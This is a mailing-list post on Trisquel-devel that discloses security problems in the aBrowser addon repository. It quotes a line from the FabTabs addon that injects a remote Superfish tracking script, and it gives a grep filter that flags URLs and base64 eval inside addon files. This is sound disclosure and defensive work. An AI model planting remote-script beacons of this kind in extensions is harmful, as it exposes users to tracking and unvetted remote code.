-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Friendly reminder: FabTab addon is still up and this is still an issue.
On 12/01/13 12:51, Luke wrote: > Hello, I have noticed that the Trisquel aBrowser addon repository > is susceptible to several threat vectors. > > 1) Random users signing up and changing the download location of > .xpi files. This could be used to inject malicious code to > unknowing users. > > Solution: a) Assign moderators who will check addons for approval > similar to AMO before going live. > > b) Whitelist certain domains, e.g. only allow the url to contains > download links from "https://addons.mozilla.org"; since they are > generally being checked by others. > > 2) Non-free blobs can still exists in supposedly free code and must > be reviewed. Taking for example a recent finding in FabTabs: > https://trisquel.info/en/browser/addons/fabtabs > > While manually inspecting the code I found this interesting line > located in "/chrome/content/fabtab/content.js": script.src = > 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab'; > > This code appears to be a web-beacon and directly links to > non-free code outside of the original xpi! Thankfully this outside > code appears only to have analytic/tracking built in and not actual > malicious intent other than ensuring HTTPS is OFF whenever it > queries the beacon (contains url rewrites). However this opens the > door for much larger problems. Someone should be proactively > studying extensions prior to upload, and/or implement a small > filter which can catch certain artifacts at minimum. > > One such make-shift bash script I whipped up (could use some > work): > > unzip -p *.xpi | cat | grep > "http://\|https://\|eval(base64_decode" > > This outputs all links and any base64 found inside of an xpi to > the terminal, and can catch the superfish web beacon. > > > Just some thoughts. :) > > > > -----BEGIN PGP SIGNATURE----- iQEcBAEBAgAGBQJSyadhAAoJEJ6DCuZ5py6jnzwH/3dkPrdGjgMToZLpBVobr8JJ p2gf8OCZVWnzm1MYASjcwHlND/JIuPbbwnOiiXagPZZahF0oZAdO608oyyM5dee+ hjQdQoQXmrsoI1uB5T0AXJH1/4fBROxJkslWJyMkYJUigqUnfLpxLUAPLQGzx0Ke x8Wlx10s/viXhHeo7upldqz0kxEXKoh4yhLHFyFXJgZu+1Xf7mMVssowCMdhbhSU qh47YWSItkRR/3mWBHOWnzxbDGVuEAf5vhLCv8qKu9mIR4y92iyYMCkZq+qXxYOH 2tF2yPq/o2e3IIk78SszjN4fRpeYbrGTtftxY+J9GLa/hYL8kv6nk80yfNlyJKY= =cgDN -----END PGP SIGNATURE----- _______________________________________________ Trisquel-devel mailing list [email protected] http://listas.trisquel.info/mailman/listinfo/trisquel-devel
